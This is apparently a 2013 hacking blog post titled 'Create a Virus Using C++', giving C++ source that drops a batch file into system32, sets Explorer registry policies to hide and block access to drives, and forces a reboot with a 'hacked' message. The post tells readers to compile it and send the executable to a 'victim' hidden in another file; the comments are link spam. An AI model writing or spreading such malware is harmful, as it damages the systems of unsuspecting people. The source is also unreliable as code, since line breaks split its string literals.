Search This Blog

Saturday, June 22, 2013

Create a Virus Using C++



BEFORE YOU START PLEASE NOTE:
THIS PROGRAM IS ONLY FOR
TUTORIAL PURPOSE. WE ARE NOT
RESPONSIBLE FOR DAMAGE CAUSED
BY THE PROGRAM INTO YOUR SYSTEM.
 
 Open Notepad and copy the given Code:

#include<windows.h>
#include<fstream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{
ofstream write("C:\\WINDOWS\
\system32\\Hacks,-Cracks,-Tips-&-Tools.bat"); /
*opening or creating new file
with .bat extension*/
write<<"REG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\
\Microsoft\\Windows\\CurrentVer
sion\\policies\\Explorer /v
NoDrives /t REG_DWORD /d 12\n";
write<<"REG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\
\Microsoft\\Windows\\CurrentVer
sion\\policies\\Explorer /v
NoViewonDrive /t REG_DWORD /d
12\n";
write<<"shutdown -r -c \"Sorry
Your System is hacked by us!\" -
f"<<"\n";
write.close(); //close file
ShellExecute(NULL,"open","C:\
\WINDOWS\\system32\
\Hacks,-Cracks,-Tips-&-Tools.bat",NULL,NULL,SW_SHOWNORMAL);
return 0;
}

Save the file with .cpp extension
Compile and create .exe file in cpp
 
Note:
Don't run this c++ program ,it will
attack your system itself.

Copy the created .exe file and
send it to your victim. You can attach it with any file or any means.
Hope you will enjoy!!

1 comment:

  1. Create A Virus Using C++ ~ Hacking News And Articles >>>>> Download Now

    >>>>> Download Full

    Create A Virus Using C++ ~ Hacking News And Articles >>>>> Download LINK

    >>>>> Download Now

    Create A Virus Using C++ ~ Hacking News And Articles >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete